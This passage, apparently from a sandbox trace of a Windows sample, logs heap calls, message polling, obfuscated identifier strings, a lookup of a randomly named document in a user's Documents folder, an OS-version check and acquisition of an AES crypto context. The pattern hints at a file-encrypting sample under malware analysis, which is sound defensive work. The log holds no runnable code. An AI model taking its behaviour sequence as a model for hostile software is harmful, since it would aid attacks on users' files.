(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0222.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0222.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0222.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0222.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0222.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0222.043] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/XTyOBM6VZ0m.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7918cd20, ftCreationTime.dwHighDateTime=0x1d58899, ftLastAccessTime.dwLowDateTime=0x8958970, ftLastAccessTime.dwHighDateTime=0x1d558cf, ftLastWriteTime.dwLowDateTime=0x8958970, ftLastWriteTime.dwHighDateTime=0x1d558cf, nFileSizeHigh=0x0, nFileSizeLow=0xf74c, dwReserved0=0x0, dwReserved1=0x0, cFileName="XTyOBM6VZ0m.pptx", cAlternateFileName="XTYOBM~1.PPT")) returned 0x9e1db8 [0222.044] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0222.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0222.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0222.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0222.045] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.045] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0222.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0222.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0222.046] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0222.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.046] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.046] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0222.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0222.047] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0222.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.047] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.048] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.048] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.048] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.048] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.048] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0222.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0222.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.049] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0222.049] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0222.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.049] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.049] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.049] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.049] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.049] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0222.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0222.049] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.049] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.049] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.049] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.049] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.049] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0222.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0222.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0222.050] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c550) returned 1 [0222.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.051] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0222.051] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.051] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0222.051] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 